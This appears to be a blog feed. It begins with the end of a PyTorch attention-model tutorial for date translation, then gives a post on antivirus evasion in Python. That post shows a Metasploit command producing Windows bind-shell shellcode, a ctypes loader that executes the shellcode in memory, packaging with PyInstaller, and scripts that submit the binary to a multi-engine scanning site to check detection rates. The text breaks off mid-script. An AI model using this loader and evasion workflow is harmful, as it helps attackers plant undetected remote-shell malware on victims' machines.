                                <span class="mi">2</span><span class="p">).</span><span class="n">reshape</span><span class="p">(</span><span class="n">batch</span> <span class="o">*</span> <span class="n">n_squence</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="c1"># x: [batch * n_sequence, 1]
</span>    <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">attention_linear</span><span class="p">(</span><span class="n">attention_input</span><span class="p">)</span>
    <span class="c1"># x: [batch, n_sequence]
</span>    <span class="n">x</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">reshape</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="n">n_squence</span><span class="p">)</span>
    <span class="n">alpha</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">softmax</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
</code></pre></div></div>
<p>With the attention alpha computed, we can use it to compute the attention context c.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">c</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="nb">sum</span><span class="p">(</span><span class="n">a</span> <span class="o">*</span> <span class="n">alpha</span><span class="p">.</span><span class="n">reshape</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="n">n_squence</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="mi">1</span><span class="p">)</span>
</code></pre></div></div>
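<p>To make the two steps above concrete, here is a plain-Python sketch of one attention step for a single sample: score every encoder state with a 1-output linear layer, normalize the scores with softmax over the input positions, then take the weighted sum. It uses lists instead of tensors, and the function names and toy numbers are assumptions made for illustration rather than the article's code.</p>

```python
import math


def softmax(scores):
    """Numerically stable softmax over a list of floats."""
    peak = max(scores)
    exps = [math.exp(s - peak) for s in scores]
    total = sum(exps)
    return [e / total for e in exps]


def attend(prev_s, encoder_states, weight, bias=0.0):
    """One attention step for a single sample.

    prev_s: previous decoder state (list of floats)
    encoder_states: one state vector per input position
    weight, bias: parameters of the 1-output linear layer
    """
    scores = []
    for a_t in encoder_states:
        features = prev_s + a_t  # list concatenation, like torch.cat((repeat_s, a), 2)
        scores.append(sum(w * f for w, f in zip(weight, features)) + bias)
    alpha = softmax(scores)  # normalized over input positions
    dim = len(encoder_states[0])
    context = [
        sum(alpha_t * a_t[d] for alpha_t, a_t in zip(alpha, encoder_states))
        for d in range(dim)
    ]
    return alpha, context


# Toy values, chosen only for illustration.
alpha, c = attend(
    prev_s=[0.0, 0.0],
    encoder_states=[[1.0, 0.0], [0.0, 1.0], [1.0, 1.0]],
    weight=[0.5, 0.5, 1.0, -1.0],
)
print(alpha)  # three weights that sum to 1
print(c)      # context vector with the same size as one encoder state
```

<p>The model does the same thing for a whole batch at once by reshaping the scores to [batch, n_sequence] before the softmax.</p>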
<p>Then we concatenate c with the previous output prev_y to form the decoder's input.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">c</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">unsqueeze</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="n">decoder_input</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">cat</span><span class="p">((</span><span class="n">prev_y</span><span class="p">,</span> <span class="n">c</span><span class="p">),</span> <span class="mi">2</span><span class="p">)</span>
</code></pre></div></div>
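<p>Then we simply call the decoder. Here I took a shortcut using a PyTorch default. In principle the decoder's state in the first step should be all zeros, so we would initialize two zero tensors as the LSTM's initial hidden and cell states. In PyTorch, however, calling an RNN without passing a state uses an all-zero state by default, so in the first step we can omit the state argument.</p>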
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="n">tmp_states</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
    <span class="n">prev_s</span><span class="p">,</span> <span class="n">tmp_states</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">decoder</span><span class="p">(</span><span class="n">decoder_input</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
    <span class="n">prev_s</span><span class="p">,</span> <span class="n">tmp_states</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">decoder</span><span class="p">(</span><span class="n">decoder_input</span><span class="p">,</span> <span class="n">tmp_states</span><span class="p">)</span>
</code></pre></div></div>
<p>Finally, a linear layer computes this step's output, which is written into the output tensor y. When the loop ends, y is returned.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="n">prev_y</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">output_linear</span><span class="p">(</span><span class="n">prev_s</span><span class="p">)</span>
    <span class="n">y</span><span class="p">[:,</span> <span class="n">i_output</span><span class="p">]</span> <span class="o">=</span> <span class="n">prev_y</span><span class="p">.</span><span class="n">squeeze</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

<span class="k">return</span> <span class="n">y</span>
</code></pre></div></div>
<h3 id="训练测试推理">Training, testing, and inference</h3>
<p>With the core attention model written, the rest of the code is fairly simple.</p>

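<p>First we need a Dataset class. It reads the input and output strings and converts them into integer arrays. The mapping between characters and integers is brute-force: a character's index is simply its ASCII code. This keeps the code short, but since many characters are never used, it wastes some computation.</p>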
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">stoi</span><span class="p">(</span><span class="nb">str</span><span class="p">):</span>
    <span class="k">return</span> <span class="n">torch</span><span class="p">.</span><span class="n">LongTensor</span><span class="p">([</span><span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">)</span> <span class="k">for</span> <span class="n">char</span> <span class="ow">in</span> <span class="nb">str</span><span class="p">])</span>


<span class="k">def</span> <span class="nf">itos</span><span class="p">(</span><span class="n">arr</span><span class="p">):</span>
    <span class="k">return</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">([</span><span class="nb">chr</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">arr</span><span class="p">])</span>


<span class="k">class</span> <span class="nc">DateDataset</span><span class="p">(</span><span class="n">Dataset</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">lines</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">lines</span> <span class="o">=</span> <span class="n">lines</span>

    <span class="k">def</span> <span class="nf">__len__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">return</span> <span class="nb">len</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">lines</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">__getitem__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">index</span><span class="p">):</span>
        <span class="n">line</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">lines</span><span class="p">[</span><span class="n">index</span><span class="p">]</span>

        <span class="k">return</span> <span class="n">stoi</span><span class="p">(</span><span class="n">line</span><span class="p">[</span><span class="mi">0</span><span class="p">]),</span> <span class="n">stoi</span><span class="p">(</span><span class="n">line</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span>
</code></pre></div></div>
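<p>With the Dataset ready, we can create the DataLoader. In sequence tasks, samples may have different sequence lengths. PyTorch's pad_sequence pads the shorter samples with 0 so that all samples in a batch have the same sequence length.</p>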
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">get_dataloader</span><span class="p">(</span><span class="n">filename</span><span class="p">):</span>

    <span class="k">def</span> <span class="nf">collate_fn</span><span class="p">(</span><span class="n">batch</span><span class="p">):</span>
        <span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="nb">zip</span><span class="p">(</span><span class="o">*</span><span class="n">batch</span><span class="p">)</span>
        <span class="n">x_pad</span> <span class="o">=</span> <span class="n">pad_sequence</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">batch_first</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
        <span class="n">y_pad</span> <span class="o">=</span> <span class="n">pad_sequence</span><span class="p">(</span><span class="n">y</span><span class="p">,</span> <span class="n">batch_first</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">x_pad</span><span class="p">,</span> <span class="n">y_pad</span>

    <span class="n">lines</span> <span class="o">=</span> <span class="n">load_date_data</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span>
    <span class="n">dataset</span> <span class="o">=</span> <span class="n">DateDataset</span><span class="p">(</span><span class="n">lines</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">DataLoader</span><span class="p">(</span><span class="n">dataset</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="n">collate_fn</span><span class="o">=</span><span class="n">collate_fn</span><span class="p">)</span>
</code></pre></div></div>
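<p>One point to note: pad_sequence pads with 0 by default, and 0 padding is reasonable in this project. In our vocabulary, 0 corresponds to ASCII character number 0 (NUL), which does not collide with any other character.</p>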
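<p>The effect of the padding can be sketched without PyTorch. The helper <code class="language-plaintext highlighter-rouge">pad_batch</code> below is a hypothetical plain-Python stand-in that mimics what pad_sequence with batch_first=True does to a batch of id lists; it is not the library function itself.</p>

```python
def pad_batch(sequences, pad_value=0):
    """Right-pad every sequence to the longest length in the batch."""
    max_len = max(len(seq) for seq in sequences)
    return [list(seq) + [pad_value] * (max_len - len(seq)) for seq in sequences]


# Two inputs of different lengths (10 and 15 characters), encoded as ASCII codes.
batch = [[ord(ch) for ch in text] for text in ("15/10/1971", "4 November 1988")]
padded = pad_batch(batch)
print([len(row) for row in padded])  # [15, 15]
print(padded[0][10:])                # [0, 0, 0, 0, 0]
```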

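<p>With everything prepared, we can start training. The training code is entirely conventional: define an Adam optimizer and a cross-entropy loss, run the model, reshape the output to compute the loss, and backpropagate.</p>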
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def main():
    device = 'cuda:0'
    train_dataloader = get_dataloader('dldemos/attention/train.txt')
    test_dataloader = get_dataloader('dldemos/attention/test.txt')

    model = AttentionModel().to(device)

    # train

    optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
    citerion = torch.nn.CrossEntropyLoss()
    for epoch in range(20):

        loss_sum = 0
        dataset_len = len(train_dataloader.dataset)

        for x, y in train_dataloader:
            x = x.to(device)
            y = y.to(device)
            hat_y = model(x)
            n, Tx, _ = hat_y.shape
            hat_y = torch.reshape(hat_y, (n * Tx, -1))
            label_y = torch.reshape(y, (n * Tx, ))
            loss = citerion(hat_y, label_y)

            optimizer.zero_grad()
            loss.backward()
            torch.nn.utils.clip_grad_norm_(model.parameters(), 0.5)
            optimizer.step()

            loss_sum += loss.item() * n

        print(f'Epoch {epoch}. loss: {loss_sum / dataset_len}')

    torch.save(model.state_dict(), 'dldemos/attention/model.pth')
</code></pre></div></div>
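<p>The reshape before the loss treats every character position of every sample as one classification example. The plain-Python sketch below illustrates that idea under the assumption that the loss is the mean of the negative log-softmax at the label, which is how I understand cross-entropy with mean reduction; the function names and the toy batch are invented for illustration.</p>

```python
import math


def flatten_batch(hat_y, y):
    """[n][Tx][classes] scores and [n][Tx] labels -> [n*Tx][classes] and [n*Tx]."""
    flat_scores = [row for sample in hat_y for row in sample]
    flat_labels = [label for sample in y for label in sample]
    return flat_scores, flat_labels


def cross_entropy(flat_scores, flat_labels):
    """Mean of -log softmax(scores)[label] over all rows."""
    total = 0.0
    for row, label in zip(flat_scores, flat_labels):
        peak = max(row)
        log_sum_exp = peak + math.log(sum(math.exp(v - peak) for v in row))
        total += log_sum_exp - row[label]
    return total / len(flat_labels)


# Toy batch: n=2 samples, Tx=2 positions, 4 classes, all-zero scores.
hat_y = [[[0.0] * 4, [0.0] * 4], [[0.0] * 4, [0.0] * 4]]
y = [[1, 3], [0, 2]]
scores, labels = flatten_batch(hat_y, y)
print(len(scores), len(labels))       # 4 4
print(cross_entropy(scores, labels))  # log(4), since every class is equally likely
```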
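<p>After training, we can measure the model's accuracy on the test set. In the date translation task, we define "correct" as the output matching the ground truth exactly. For example, if a date's ground truth is "2000-01-01", the model's output must also be "2000-01-01" to count as correct. Writing parallelized code for this accuracy takes a little care.</p>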

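<p>The model output hat_y holds a score for every character at every position. We first use <code class="language-plaintext highlighter-rouge">prediction = torch.argmax(hat_y, 2)</code> to take the highest-scoring character at each position as the predicted character. Next we need to decide, in parallel, whether each pair of sequences (integer label arrays) prediction[i] and y[i] is equal (note that prediction and y carry the batch dimension). Here we subtract y[i] from prediction[i] and sum the result, and treat the two as equal when the sum is 0. Strictly speaking, differences of opposite sign can cancel in this sum, so the check can occasionally accept a mismatched pair; summing absolute differences or comparing element-wise is stricter. With this somewhat roundabout approach the accuracy can be computed in parallel.</p>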

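<p>There may be a more convenient API for this comparison, but searching online for such a specific requirement was too much trouble, so I took a shortcut.</p>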
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># test
</span><span class="n">model</span><span class="p">.</span><span class="n">load_state_dict</span><span class="p">(</span><span class="n">torch</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="s">'dldemos/attention/model.pth'</span><span class="p">))</span>

<span class="n">accuracy</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">dataset_len</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">test_dataloader</span><span class="p">.</span><span class="n">dataset</span><span class="p">)</span>

<span class="k">for</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="ow">in</span> <span class="n">test_dataloader</span><span class="p">:</span>
    <span class="n">x</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>
    <span class="n">y</span> <span class="o">=</span> <span class="n">y</span><span class="p">.</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>
    <span class="n">hat_y</span> <span class="o">=</span> <span class="n">model</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
    <span class="n">prediction</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">argmax</span><span class="p">(</span><span class="n">hat_y</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span>
    <span class="n">score</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">where</span><span class="p">(</span><span class="n">torch</span><span class="p">.</span><span class="nb">sum</span><span class="p">(</span><span class="n">prediction</span> <span class="o">-</span> <span class="n">y</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
    <span class="n">accuracy</span> <span class="o">+=</span> <span class="n">torch</span><span class="p">.</span><span class="nb">sum</span><span class="p">(</span><span class="n">score</span><span class="p">)</span>

<span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'Accuracy: </span><span class="si">{</span><span class="n">accuracy</span> <span class="o">/</span> <span class="n">dataset_len</span><span class="si">}</span><span class="s">'</span><span class="p">)</span>
</code></pre></div></div>
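<p>The plain-Python sketch below contrasts the sum-of-differences check with an element-wise comparison on a pair of dates where the two disagree. The function names are hypothetical and the dates are made up for illustration. In PyTorch, the element-wise variant could presumably be written as <code class="language-plaintext highlighter-rouge">(prediction == y).all(dim=-1)</code>, though that is a suggestion rather than what the original code does.</p>

```python
def sum_of_differences_is_zero(prediction, target):
    """The check used in the test loop above, for one sequence."""
    return sum(p - t for p, t in zip(prediction, target)) == 0


def exact_match(prediction, target):
    """Element-wise comparison: every position must agree."""
    return all(p == t for p, t in zip(prediction, target))


def exact_match_accuracy(predictions, targets):
    """Fraction of sequences that match their target at every position."""
    hits = sum(1 for p, t in zip(predictions, targets) if exact_match(p, t))
    return hits / len(targets)


# The last two characters differ by +1 and -1, so the differences cancel.
pred = [ord(ch) for ch in "1989-10-18"]
true = [ord(ch) for ch in "1989-10-09"]
print(sum_of_differences_is_zero(pred, true))  # True
print(exact_match(pred, true))                 # False
```

<p>Both helpers assume the two sequences have the same length, which holds here because every output has exactly 10 characters.</p>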
<p>Finally, we can generate a few test cases on the fly and print the model's predictions.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># inference
</span><span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">5</span><span class="p">):</span>
    <span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="n">generate_date</span><span class="p">()</span>
    <span class="n">origin_x</span> <span class="o">=</span> <span class="n">x</span>
    <span class="n">x</span> <span class="o">=</span> <span class="n">stoi</span><span class="p">(</span><span class="n">x</span><span class="p">).</span><span class="n">unsqueeze</span><span class="p">(</span><span class="mi">0</span><span class="p">).</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>
    <span class="n">hat_y</span> <span class="o">=</span> <span class="n">model</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
    <span class="n">hat_y</span> <span class="o">=</span> <span class="n">hat_y</span><span class="p">.</span><span class="n">squeeze</span><span class="p">(</span><span class="mi">0</span><span class="p">).</span><span class="n">argmax</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">hat_y</span> <span class="o">=</span> <span class="n">itos</span><span class="p">(</span><span class="n">hat_y</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'input: </span><span class="si">{</span><span class="n">origin_x</span><span class="si">}</span><span class="s">, prediction: </span><span class="si">{</span><span class="n">hat_y</span><span class="si">}</span><span class="s">, gt: </span><span class="si">{</span><span class="n">y</span><span class="si">}</span><span class="s">'</span><span class="p">)</span>
</code></pre></div></div>
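<p>After 20 to 30 epochs the model has more or less converged. My trained model reaches about 98% accuracy on the test set. Below are inference results on random test cases; the model's predictions are indeed accurate.</p>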
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>input: 4 November 1988, prediction: 1988-11-04, gt: 1988-11-04
input: Friday 26, March 2021, prediction: 2021-03-26, gt: 2021-03-26
input: Saturday 2, December 1989, prediction: 1989-12-02, gt: 1989-12-02
input: 15/10/1971, prediction: 1971-10-15, gt: 1971-10-15
input: Mon 9, Oct 1989, prediction: 1989-10-09, gt: 1989-10-09
</code></pre></div></div>
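<p>An accuracy figure like the one above is typically an exact-match score: a prediction counts as correct only when the whole output string equals the ground truth. The post does not show its evaluation code, so the following is only a minimal sketch under that assumption; <code class="language-plaintext highlighter-rouge">exact_match_accuracy</code> is a hypothetical helper name, and the sample pairs are copied from the output above.</p>

```python
def exact_match_accuracy(predictions, targets):
    """Return the fraction of predictions that equal their target exactly."""
    if len(predictions) != len(targets):
        raise ValueError("predictions and targets must have the same length")
    if not targets:
        return 0.0
    correct = sum(p == t for p, t in zip(predictions, targets))
    return correct / len(targets)


# (prediction, ground truth) pairs taken from the sample output above.
samples = [
    ("1988-11-04", "1988-11-04"),
    ("2021-03-26", "2021-03-26"),
    ("1989-12-02", "1989-12-02"),
    ("1971-10-15", "1971-10-15"),
    ("1989-10-09", "1989-10-09"),
]
predictions = [p for p, _ in samples]
targets = [t for _, t in samples]
print(exact_match_accuracy(predictions, targets))
```

<p>Exact match is a strict metric for this task: a date with a single wrong digit scores zero, which is usually what you want when the output is meant to be machine-readable.</p>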
<h3 id="总结">Summary</h3>
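<p>In this post I presented an attention model written in PyTorch for a date translation task. The most important part of the project is writing the attention model itself. Attention models of this kind are no longer the most powerful architecture available. Still, implementing one by hand gives a deeper understanding of the attention mechanism and makes more advanced models easier to follow.</p>]]></content><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><category term="python" /><category term="pytorch" /><category term="attention" /><summary type="html"><![CDATA[A detailed walkthrough of implementing an attention model in PyTorch (using simple machine translation as the example). The “attention” in the Transformer originated in the attention models of NLP. Implementing an attention model by hand gives a deeper understanding of how attention works and makes it easier to study the Transformer and other later attention-based models. In this post I share how to implement an attention model with PyTorch's basic APIs and complete a simple machine translation project: “translating” dates in various formats into one unified format.]]></summary></entry><entry><title type="html">Using Python to implement anti-killing</title><link href="https://crabin.github.io/posts/2024/12/Using%20Python%20to%20implement%20anti-killing/" rel="alternate" type="text/html" title="Using Python to implement anti-killing" /><published>2024-12-23T00:00:00+00:00</published><updated>2024-12-23T00:00:00+00:00</updated><id>https://crabin.github.io/posts/2024/12/Using%20Python%20to%20implement%20anti-killing</id><content type="html" xml:base="https://crabin.github.io/posts/2024/12/Using%20Python%20to%20implement%20anti-killing/"><![CDATA[<h2 id="用-python-实现免杀">Implementing Antivirus Evasion with Python</h2>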

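<p>Consider the malware known as Flame. Once compiled with the Lua scripts named Beetlejuice, Microbe, Frog, Snack, and Gator, it can use Bluetooth to mark the computers it has compromised, secretly record audio, infect nearby computers, and upload screenshots and data to a remote command-and-control server. Most antivirus engines nevertheless still rely on signature-based detection as their primary detection method.</p>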

<h2 id="免杀的过程">The Evasion Process</h2>

<p>The Metasploit framework includes a library of malicious payloads. Use Metasploit to generate C-style shellcode to serve as the payload.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># msfpayload windows/shell_bind_tcp LPORT=1337 C</span>
</code></pre></div></div>

<p>Next, write a script that executes this C-style shellcode. Python can import function libraries written in other languages; importing the ctypes library lets us use C data types.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">ctypes</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">shellcode</span> <span class="o">=</span> <span class="p">(</span><span class="s">"..."</span><span class="p">)</span>
<span class="n">memory_with_shell</span> <span class="o">=</span> <span class="n">create_string_buffer</span><span class="p">(</span><span class="n">shellcode</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">))</span>
<span class="n">shell</span> <span class="o">=</span> <span class="n">cast</span><span class="p">(</span><span class="n">memory_with_shell</span><span class="p">,</span> <span class="n">CFUNCTYPE</span><span class="p">(</span><span class="n">c_void_p</span><span class="p">))</span>
<span class="n">shell</span><span class="p">()</span>
</code></pre></div></div>

<p>The next step is to use PyInstaller to produce an executable in the Windows PE (Portable Executable) format.</p>

<h3 id="免杀验证">Verifying the Evasion</h3>

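<p>Use the <code class="language-plaintext highlighter-rouge">vscan.novirusthanks.org</code> service to scan the executable. NoVirusThanks provides a web interface where a suspicious file can be uploaded and then scanned by a number of different antivirus engines. A small Python script can automate this step: capture a tcpdump trace while interacting with the web interface, then reproduce the request with the httplib library.</p>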

<p>Note the boundary field, which separates the file contents from the other parts of the request body.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">upload_file</span><span class="p">(</span><span class="n">file_name</span><span class="p">):</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Uploading file to NoVirusThanks..."</span><span class="p">)</span>
    <span class="n">file_contents</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">file_name</span><span class="p">,</span> <span class="s">"rb"</span><span class="p">).</span><span class="n">read</span><span class="p">()</span>
    <span class="n">header</span> <span class="o">=</span> <span class="p">{</span>
      <span class="s">"Content-Type"</span><span class="p">:</span> <span class="s">"multipart/form-data; boundary=----WebKitFormBoundaryF17rwCZdGuPNPT9U"</span>
    <span class="p">}</span>
    <span class="n">params</span> <span class="o">=</span> <span class="s">"------WebKitFormBoundaryF17rwCZdGuPNPT9U"</span>
    <span class="n">params</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\r\n</span><span class="s">Content-Disposition: form-data; name="upfile"; filename="{}"'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">file_name</span><span class="p">)</span>
    <span class="n">params</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\r\n</span><span class="s">Content-Type: application/octet-stream</span><span class="se">\r\n\r\n</span><span class="s">'</span>
    <span class="n">params</span> <span class="o">+=</span> <span class="n">file_contents</span>
    <span class="n">params</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\r\n</span><span class="s">------WebKitFormBoundaryF17rwCZdGuPNPT9U'</span>
    <span class="n">params</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\r\n</span><span class="s">Content-Disposition: form-data; name="submitfile"</span><span class="se">\r\n</span><span class="s">'</span>
    <span class="n">params</span> <span class="o">+=</span> <span class="s">"------WebKitFormBoundaryF17rwCZdGuPNPT9U--</span><span class="se">\r\n</span><span class="s">"</span>
    <span class="n">conn</span> <span class="o">=</span> <span class="n">httplib</span><span class="p">.</span><span class="n">HTTPConnection</span><span class="p">(</span><span class="s">"vscan.novirusthanks.org"</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">request</span><span class="p">(</span><span class="s">"POST"</span><span class="p">,</span> <span class="s">"/"</span><span class="p">,</span> <span class="n">params</span><span class="p">,</span> <span class="n">header</span><span class="p">)</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">getresponse</span><span class="p">()</span>
    <span class="n">location</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">getheader</span><span class="p">(</span><span class="s">"location"</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
    <span class="k">return</span> <span class="n">location</span>
</code></pre></div></div>
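<p>The boundary rule is easy to get wrong by hand: every part starts with two hyphens followed by the boundary token, the body ends with that same delimiter plus two more hyphens, and all line breaks are CRLF. The following is a minimal Python 3 sketch of that framing only. It sends nothing, <code class="language-plaintext highlighter-rouge">build_multipart_body</code> is a hypothetical helper name, and the boundary token and file name in the usage lines are placeholders.</p>

```python
import uuid


def build_multipart_body(field_name, file_name, file_bytes, boundary=None):
    """Build a multipart/form-data body holding a single file part.

    Returns (content_type_header_value, body_bytes).
    """
    if boundary is None:
        # Any token that does not occur in the payload works as a boundary.
        boundary = "----SketchBoundary" + uuid.uuid4().hex
    delimiter = ("--" + boundary).encode("ascii")
    lines = [
        delimiter,  # each part starts with "--" followed by the boundary
        'Content-Disposition: form-data; name="{}"; filename="{}"'.format(
            field_name, file_name
        ).encode("utf-8"),
        b"Content-Type: application/octet-stream",
        b"",  # blank line separates the part headers from the content
        file_bytes,
        delimiter + b"--",  # the closing delimiter has a trailing "--"
        b"",
    ]
    body = b"\r\n".join(lines)
    content_type = "multipart/form-data; boundary=" + boundary
    return content_type, body


content_type, body = build_multipart_body(
    "upfile", "sample.bin", b"\x00\x01demo", boundary="XYZ"
)
print(content_type)
print(body)
```

<p>Working in bytes rather than text keeps binary file contents intact, and generating the boundary avoids a mismatch between the header and the body.</p>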

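<p>Next, write a Python script that prints the scan results for the uploaded file. The script first connects to the “file” page, which returns a “scan in progress” message. Once that page returns an HTTP 302, the redirect leads to the analysis results page, where a regular expression reads the detection rate and the CSS markup is replaced with an empty string.</p>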

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">print_results</span><span class="p">(</span><span class="n">url</span><span class="p">):</span>
    <span class="n">status</span> <span class="o">=</span> <span class="mi">200</span>
    <span class="n">host</span> <span class="o">=</span> <span class="n">url_parse</span><span class="p">(</span><span class="n">url</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span>
    <span class="n">path</span> <span class="o">=</span> <span class="n">url_parse</span><span class="p">(</span><span class="n">url</span><span class="p">)[</span><span class="mi">2</span><span class="p">]</span>
    <span class="k">if</span> <span class="s">"analysis"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">path</span><span class="p">:</span>
        <span class="k">while</span> <span class="n">status</span> <span class="o">!=</span> <span class="mi">302</span><span class="p">:</span>
            <span class="n">conn</span> <span class="o">=</span> <span class="n">httplib</span><span class="p">.</span><span class="n">HTTPConnection</span><span class="p">(</span><span class="n">host</span><span class="p">)</span>
            <span class="n">conn</span><span class="p">.</span><span class="n">request</span><span class="p">(</span><span class="s">"GET"</span><span class="p">,</span> <span class="n">path</span><span class="p">)</span>
            <span class="n">resp</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">getresponse</span><span class="p">()</span>
            <span class="n">status</span> <span class="o">=</span> <span class="n">resp</span><span class="p">.</span><span class="n">status</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Scanning file..."</span><span class="p">)</span>
            <span class="n">conn</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
            <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">15</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Scan Complete."</span><span class="p">)</span>
    <span class="n">path</span> <span class="o">=</span> <span class="n">path</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="s">"file"</span><span class="p">,</span> <span class="s">"analysis"</span><span class="p">)</span>
    <span class="n">conn</span> <span class="o">=</span> <span class="n">httplib</span><span class="p">.</span><span class="n">HTTPConnection</span><span class="p">(</span><span class="n">host</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">request</span><span class="p">(</span><span class="s">"GET"</span><span class="p">,</span> <span class="n">path</span><span class="p">)</span>
    <span class="n">resp</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">getresponse</span><span class="p">()</span>
    <span class="n">data</span> <span class="o">=</span> <span class="n">resp</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
